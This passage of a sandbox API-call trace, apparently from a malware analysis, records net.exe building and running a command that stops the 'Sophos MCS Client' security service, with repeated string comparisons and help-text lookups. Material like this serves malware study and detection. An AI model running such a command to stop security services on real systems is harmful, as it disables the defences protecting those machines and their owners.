(_String1="WKSTA", _String2="ΓÇ£Sophos") returned -828 [0204.156] _wcsicmp (_String1="WKSTA", _String2="MCS") returned 10 [0204.156] _wcsicmp (_String1="WKSTA", _String2="ClientΓÇ¥") returned 20 [0204.156] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" PRDR" [0204.156] wcsspn (_String=" PRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0204.156] _wcsicmp (_String1="PRDR", _String2="stop") returned -3 [0204.156] _wcsicmp (_String1="PRDR", _String2="ΓÇ£Sophos") returned -835 [0204.156] _wcsicmp (_String1="PRDR", _String2="MCS") returned 3 [0204.156] _wcsicmp (_String1="PRDR", _String2="ClientΓÇ¥") returned 13 [0204.156] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" DEVRDR" [0204.156] wcsspn (_String=" DEVRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0204.156] _wcsicmp (_String1="DEVRDR", _String2="stop") returned -15 [0204.156] _wcsicmp (_String1="DEVRDR", _String2="ΓÇ£Sophos") returned -847 [0204.156] _wcsicmp (_String1="DEVRDR", _String2="MCS") returned -9 [0204.156] _wcsicmp (_String1="DEVRDR", _String2="ClientΓÇ¥") returned 1 [0204.156] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0204.157] wcstok (in: _String="\r\nSERVER: SVR, SRV", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSERVER", _Context=0x3d6) returned="\r\nSERVER" [0204.157] wcsspn (_String="\r\nSERVER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0204.157] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SVR" [0204.157] wcsspn (_String=" SVR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0204.157] _wcsicmp (_String1="SVR", _String2="stop") returned 2 [0204.157] _wcsicmp (_String1="SVR", _String2="ΓÇ£Sophos") returned -832 [0204.157] _wcsicmp (_String1="SVR", _String2="MCS") returned 6 [0204.157] _wcsicmp (_String1="SVR", _String2="ClientΓÇ¥") returned 16 [0204.157] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SRV" [0204.157] wcsspn (_String=" SRV", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0204.157] _wcsicmp (_String1="SRV", _String2="stop") returned -2 [0204.157] _wcsicmp (_String1="SRV", _String2="ΓÇ£Sophos") returned -832 [0204.157] _wcsicmp (_String1="SRV", _String2="MCS") returned 6 [0204.157] _wcsicmp (_String1="SRV", _String2="ClientΓÇ¥") returned 16 [0204.157] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0204.157] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc67, dwLanguageId=0x0, lpBuffer=0x32f988, nSize=0x0, Arguments=0x32f984 | out: lpBuffer="嗠vꔺ瓡") returned 0x1c [0204.157] wcstok (in: _String="NAMES$\r\nSYNTAX$\r\nSERVICES$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="NAMES", _Context=0x3d6) returned="NAMES" [0204.157] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSYNTAX" [0204.157] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVICES" [0204.157] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0204.157] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0204.157] wcsspn (_String="NAMES", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0204.157] _wcsicmp (_String1="stop", _String2="NAMES") returned 5 [0204.157] wcsspn (_String="\r\nSYNTAX", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0204.157] _wcsicmp (_String1="stop", _String2="SYNTAX") returned -5 [0204.157] wcsspn (_String="\r\nSERVICES", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0204.157] _wcsicmp (_String1="stop", _String2="SERVICES") returned 15 [0204.158] wcscpy_s (in: _Destination=0x41a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0204.158] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0204.158] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x111d, dwLanguageId=0x0, lpBuffer=0x41b338, nSize=0x800, Arguments=0x419dd8 | out: lpBuffer="The syntax of this command is:\r\n") returned 0x20 [0204.159] GetFileType (hFile=0x26c) returned 0x3 [0204.159] LocalAlloc (uFlags=0x0, uBytes=0x40) returned 0x763c10 [0204.159] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The syntax of this command is:\r\n", cchWideChar=32, lpMultiByteStr=0x763c10, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The syntax of this command is:\r\n", lpUsedDefaultChar=0x0) returned 32 [0204.159] WriteFile (in: hFile=0x26c, lpBuffer=0x763c10, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x32f968, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x32f968, lpOverlapped=0x0) returned 0 [0204.159] LocalFree (hMem=0x763c10) returned 0x0 [0204.159] GetFileType (hFile=0x26c) returned 0x3 [0204.159] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x763918 [0204.159] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x763918, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nv", lpUsedDefaultChar=0x0) returned 2 [0204.159] WriteFile (in: hFile=0x26c, lpBuffer=0x763918, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x32f968, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x32f968, lpOverlapped=0x0) returned 0 [0204.159] LocalFree (hMem=0x763918) returned 0x0 [0204.159] wcscpy_s (in: _Destination=0x32fa20, _SizeInWords=0x200, _Source="NET" | out: _Destination="NET") returned 0x0 [0204.159] wcsncat_s (in: _Destination="NET", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET ") returned 0x0 [0204.159] wcsncat_s (in: _Destination="NET ", _SizeInWords=0x200, _Source="stop", _MaxCount=0xffffffff | out: _Destination="NET stop") returned 0x0 [0204.160] wcsncat_s (in: _Destination="NET stop", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ") returned 0x0 [0204.160] wcsncat_s (in: _Destination="NET stop ", _SizeInWords=0x200, _Source="ΓÇ£Sophos", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos") returned 0x0 [0204.160] wcsncat_s (in: _Destination="NET stop ΓÇ£Sophos", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos ") returned 0x0 [0204.160] wcsncat_s (in: _Destination="NET stop ΓÇ£Sophos ", _SizeInWords=0x200, _Source="MCS", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos MCS") returned 0x0 [0204.160] wcsncat_s (in: _Destination="NET stop ΓÇ£Sophos MCS", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos MCS ") returned 0x0 [0204.160] wcsncat_s (in: _Destination="NET stop ΓÇ£Sophos MCS ", _SizeInWords=0x200, _Source="ClientΓÇ¥", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos MCS ClientΓÇ¥") returned 0x0 [0204.160] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v댸A歷2ѰAɬ") returned 0xad [0204.160] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS ClientΓÇ¥", _String2="NET ACCOUNTS\r\n[/FORCELOGOFF:{min", _MaxCount=0x20) returned 18 [0204.160] LocalFree (hMem=0x765628) returned 0x0 [0204.160] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x2e [0204.160] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS ClientΓÇ¥", _String2="NET COMPUTER\r\n\\\\computername {/A", _MaxCount=0x20) returned 16 [0204.160] LocalFree (hMem=0x765628) returned 0x0 [0204.160] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x7d [0204.160] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS ClientΓÇ¥", _String2="NET CONFIG SERVER\r\n[/AUTODISCONN", _MaxCount=0x20) returned 16 [0204.160] LocalFree (hMem=0x765628) returned 0x0 [0204.160] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x26 [0204.160] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS ClientΓÇ¥", _String2="NET CONFIG\r\n[SERVER | WORKSTATIO", _MaxCount=0x20) returned 16 [0204.160] LocalFree (hMem=0x765628) returned 0x0 [0204.160] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x19 [0204.160] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS ClientΓÇ¥", _String2="NET CONTINUE\r\nservice\r\n\r\n", _MaxCount=0x20) returned 16 [0204.160] LocalFree (hMem=0x765628) returned 0x0 [0204.160] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x1b [0204.160] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS ClientΓÇ¥", _String2="NET FILE\r\n[id [/CLOSE]]\r\n\r\n", _MaxCount=0x20) returned 13 [0204.160] LocalFree (hMem=0x765628) returned 0x0 [0204.160] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0xbe [0204.160] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS ClientΓÇ¥", _String2="NET GROUP\r\n[groupname [/COMMENT:", _MaxCount=0x20) returned 12 [0204.160] LocalFree (hMem=0x765628) returned 0x0 [0204.160] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x33 [0204.160] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS ClientΓÇ¥", _String2="NET HELP\r\ncommand\r\n -or-\r\nNE", _MaxCount=0x20) returned 11 [0204.160] LocalFree (hMem=0x765628) returned 0x0 [0204.160] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x19 [0204.161] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS ClientΓÇ¥", _String2="NET HELPMSG\r\nmessage#\r\n\r\n", _MaxCount=0x20) returned 11 [0204.161] LocalFree (hMem=0x765628) returned 0x0 [0204.161] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0xc1 [0204.161] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS ClientΓÇ¥", _String2="NET LOCALGROUP\r\n[groupname [/COM", _MaxCount=0x20) returned 7 [0204.161] LocalFree (hMem=0x765628) returned 0x0 [0204.161] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x16 [0204.161] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS ClientΓÇ¥", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x20) returned 3 [0204.161] LocalFree (hMem=0x765628) returned 0x0 [0204.161] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x33 [0204.161] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS ClientΓÇ¥", _String2="NET SESSION\r\n[\\\\computername] [/", _MaxCount=0x20) returned 15 [0204.161] LocalFree (hMem=0x765628) returned 0x0 [0204.161] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x234 [0204.161] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS ClientΓÇ¥", _String2="NET SHARE\r\nsharename\r\n ", _MaxCount=0x20) returned 12 [0204.161] LocalFree (hMem=0x765628) returned 0x0 [0204.161] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x13 [0204.161] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS ClientΓÇ¥", _String2="NET START BROWSER\r\n", _MaxCount=0x20) returned 14 [0204.161] LocalFree (hMem=0x765628) returned 0x0 [0204.161] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x14 [0204.161] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS ClientΓÇ¥", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x20) returned 14 [0204.161] LocalFree (hMem=0x765628) returned 0x0 [0204.161] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x14 [0204.161] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS ClientΓÇ¥", _String2="NET START EVENTLOG\r\n", _MaxCount=0x20) returned 14 [0204.161] LocalFree (hMem=0x765628) returned 0x0 [0204.161] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x15 [0204.161] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS ClientΓÇ¥", _String2="NET START MESSENGER\r\n", _MaxCount=0x20) returned 14 [0204.161] LocalFree (hMem=0x765628) returned 0x0 [0204.162] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x15 [0204.162] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS ClientΓÇ¥", _String2="NET START NET LOGON\r\n", _MaxCount=0x20) returned 14 [0204.162] LocalFree (hMem=0x765628) returned 0x0 [0204.162] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x16 [0204.162] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS ClientΓÇ¥", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x20) returned 14 [0204.162] LocalFree (hMem=0x765628) returned 0x0 [0204.162] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x11 [0204.162] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS ClientΓÇ¥", _String2="NET START RPCSS\r\n", _MaxCount=0x20) returned 14 [0204.162] LocalFree (hMem=0x765628) returned 0x0 [0204.162] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x14 [0204.162] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS ClientΓÇ¥", _String2="NET START SCHEDULE\r\n", _MaxCount=0x20) returned 14 [0204.162] LocalFree (hMem=0x765628) returned 0x0 [0204.162] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x12 [0204.162] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS ClientΓÇ¥", _String2="NET START SERVER\r\n", _MaxCount=0x20) returned 14 [0204.162] LocalFree (hMem=0x765628) returned 0x0 [0204.162] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0xf [0204.162] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS ClientΓÇ¥", _String2="NET START UPS\r\n", _MaxCount=0x20) returned 14 [0204.162] LocalFree (hMem=0x765628) returned 0x0 [0204.162] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x17 [0204.162] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS ClientΓÇ¥", _String2="NET START WORKSTATION\r\n", _MaxCount=0x20) returned 14 [0204.162] LocalFree (hMem=0x765628) returned 0x0 [0204.162] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x18 [0204.162] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS ClientΓÇ¥", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x20) returned 14 [0204.162] LocalFree (hMem=0x765628) returned 0x0 [0204.162] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x2a [0204.162] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS ClientΓÇ¥", _String2="NET STATISTICS\r\n[WORKSTATION | S", _MaxCount=0x20) returned 14 [0204.162] LocalFree (hMem=0x765628) returned 0x0 [0204.162] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x15 [0204.162] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS ClientΓÇ¥", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x20) returned 19 [0204.162] LocalFree (hMem=0x765628) returned 0x0 [0204.162] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x58 [0204.162] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS ClientΓÇ¥", _String2="NET TIME\r\n\r\n[\\\\computername | /D", _MaxCount=0x20) returned -1 [0204.162] LocalFree (hMem=0x765628) returned 0x0 [0204.162] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x184 [0204.162] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS ClientΓÇ¥", _String2="NET USE\r\n[devicename | *] [\\\\com", _MaxCount=0x20) returned -2 [0204.162] LocalFree (hMem=0x765628) returned 0x0 [0204.162] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0xc7 [0204.163] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS ClientΓÇ¥", _String2="NET USER\r\n[username [password | ", _MaxCount=0x20) returned -2 [0204.163] LocalFree (hMem=0x765628) returned 0x0 [0204.163] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x47 [0204.163] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS ClientΓÇ¥", _String2="NET VIEW\r\n[\\\\computername [/CACH", _MaxCount=0x20) returned -3 [0204.163] LocalFree (hMem=0x765628) returned 0x0 [0204.163] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0xc2 [0204.163] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS ClientΓÇ¥", _String2="NET\r\n [ ACCOUNTS | COMPUTER |", _MaxCount=0x20) returned 19 [0204.163] LocalFree (hMem=0x765628) returned 0x0 [0204.163] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x319 [0204.163] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS ClientΓÇ¥", _String2="SERVICES\r\nNET START can be used ", _MaxCount=0x20) returned -5 [0204.163] LocalFree (hMem=0x765628) returned 0x0 [0204.163] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x483 [0204.163] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS ClientΓÇ¥", _String2="SYNTAX\r\nThe following convention", _MaxCount=0x20) returned -5 [0204.163] LocalFree (hMem=0x765628) returned 0x0 [0204.163] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0xa86 [0204.163] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS ClientΓÇ¥", _String2="NAMES\r\nThe following types of na", _MaxCount=0x20) returned 4 [0204.163] LocalFree (hMem=0x765628) returned 0x0 [0204.163] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x54 [0204.163] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS ClientΓÇ¥", _String2="\r\nFor more information on tools ", _MaxCount=0x20) returned 97 [0204.163] LocalFree (hMem=0x765628) returned 0x0 [0204.163] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0xad [0204.163] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET ACCOUNTS\r\n[/FORCEL", _MaxCount=0x16) returned 18 [0204.163] LocalFree (hMem=0x765628) returned 0x0 [0204.163] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x2e [0204.164] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET COMPUTER\r\n\\\\comput", _MaxCount=0x16) returned 16 [0204.164] LocalFree (hMem=0x765628) returned 0x0 [0204.164] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x7d [0204.164] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET CONFIG SERVER\r\n[/A", _MaxCount=0x16) returned 16 [0204.164] LocalFree (hMem=0x765628) returned 0x0 [0204.164] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x26 [0204.164] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET CONFIG\r\n[SERVER | ", _MaxCount=0x16) returned 16 [0204.164] LocalFree (hMem=0x765628) returned 0x0 [0204.164] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x19 [0204.164] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET CONTINUE\r\nservice\r", _MaxCount=0x16) returned 16 [0204.164] LocalFree (hMem=0x765628) returned 0x0 [0204.164] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x1b [0204.164] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET FILE\r\n[id [/CLOSE]", _MaxCount=0x16) returned 13 [0204.164] LocalFree (hMem=0x765628) returned 0x0 [0204.164] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0xbe [0204.164] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET GROUP\r\n[groupname ", _MaxCount=0x16) returned 12 [0204.164] LocalFree (hMem=0x765628) returned 0x0 [0204.164] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x33 [0204.164] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET HELP\r\ncommand\r\n ", _MaxCount=0x16) returned 11 [0204.164] LocalFree 